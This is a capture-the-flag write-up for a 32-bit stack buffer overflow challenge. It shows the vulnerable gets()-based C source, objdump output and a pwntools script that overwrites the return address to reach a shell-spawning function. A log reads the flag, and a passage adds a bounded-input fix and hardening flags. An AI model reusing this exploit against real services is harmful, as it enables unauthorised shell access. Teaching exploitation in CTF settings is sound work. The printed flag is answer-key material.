# Overflow 2 (225 points)

## Description

ez overflow (or is it?)

nc cyberyoddha.baycyber.net 10002

## Solution

Here is the file we were given.

```c
#include <stdio.h>
#include <stdlib.h>

void run_shell() {
    system("/bin/sh");
}

void vuln() {
    char buf[16];
    gets(buf);   // no bounds check: input longer than 16 bytes overwrites the stack
}

int main(void) {
    vuln();
}
```

So we need to redirect execution to the **run_shell** function using the buffer overflow (it is never called by `main`, but it is linked into the binary).
[Writeup for a similar task](https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/)
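For contrast, here is the bounded reader that `vuln()` should have used instead of `gets()`. This is an added example, not code from the challenge binary or the original writeup: `read_line_bounded` and `demo_overlong_input` are names chosen here, and the 40-byte line of `A`s is a constructed input that mirrors the overflow attempted below.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16

/* Reads one line into dst (capacity cap) and never writes past it.
   Returns the number of bytes stored, excluding the terminating NUL.
   If the line is longer than cap-1 bytes, the excess is read and
   discarded so it cannot be mistaken for the next line of input. */
size_t read_line_bounded(char *dst, size_t cap, FILE *in) {
    if (cap == 0) return 0;
    if (fgets(dst, (int)cap, in) == NULL) {   /* fgets stops at cap-1 bytes */
        dst[0] = '\0';
        return 0;
    }
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';                       /* strip the newline */
    } else {
        int c;                                 /* drain the rest of an over-long line */
        while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return n;
}

/* Feeds a constructed in-memory string through the bounded reader,
   standing in for the stdin that the challenge's vuln() reads from. */
size_t demo_overlong_input(const char *input, char *out, size_t cap) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return 0;
    size_t n = read_line_bounded(out, cap, f);
    fclose(f);
    return n;
}

int main(void) {
    char buf[BUF_SIZE];
    /* 40 'A's: longer than the buffer, like the 28-byte padding used later */
    const char *oversized = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";
    size_t n = demo_overlong_input(oversized, buf, sizeof buf);
    printf("stored %zu bytes: \"%s\"\n", n, buf);   /* stored 15 bytes */
    return 0;
}
```

With `fgets` the input is truncated at 15 bytes plus the NUL, so the saved EBP and return address above `buf` are never touched. Two other details of this binary are worth noting from the defender's side: `gets()` was removed from the C standard in C11 precisely because it cannot be used safely, and the fixed `0x0804xxxx` addresses in the `objdump` output show a non-PIE executable, which is what makes hardcoding `run_shell`'s address viable; compiling with `-fPIE -pie` and `-fstack-protector` would make this technique fail.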

Let's find the address of the **run_shell** function using **objdump**:

```shell
$ objdump -d overflow2
...
08049172 <run_shell>:
8049172: 55 push %ebp
8049173: 89 e5 mov %esp,%ebp
8049175: 53 push %ebx
8049176: 83 ec 04 sub $0x4,%esp
8049179: e8 63 00 00 00 call 80491e1 <__x86.get_pc_thunk.ax>
804917e: 05 82 2e 00 00 add $0x2e82,%eax
8049183: 83 ec 0c sub $0xc,%esp
...
```

The address is **0x8049172**, and the padding needed to reach the saved return address (the "buffer size" for our purposes) is 28 bytes: the 16-byte `buf` plus compiler alignment and the saved EBP. Now let's write a Python script with pwntools:

```python
from pwn import *

# 28 bytes of padding to reach the saved return address, then the
# address of run_shell (little-endian, 32-bit). Use bytes so the
# script also works on Python 3, where p32() returns bytes.
payload = b"A" * 28
payload += p32(0x8049172)

s = remote("cyberyoddha.baycyber.net", 10002)
s.sendline(payload)
s.interactive()
```

```shell
$ python overflow2.py
[+] Opening connection to cyberyoddha.baycyber.net on port 10002: Done
[*] Switching to interactive mode
$ ls
flag.txt
overflow2
$ cat flag.txt
CYCTF{0v3rfl0w!ng_v@ri@bl3$_i$_3z}
```

Flag: CYCTF{0v3rfl0w!ng_v@ri@bl3$_i$_3z}

Original writeup (https://github.com/holypower777/ctf_writeups/tree/main/cyberYoddhaCTF_2020/overflow).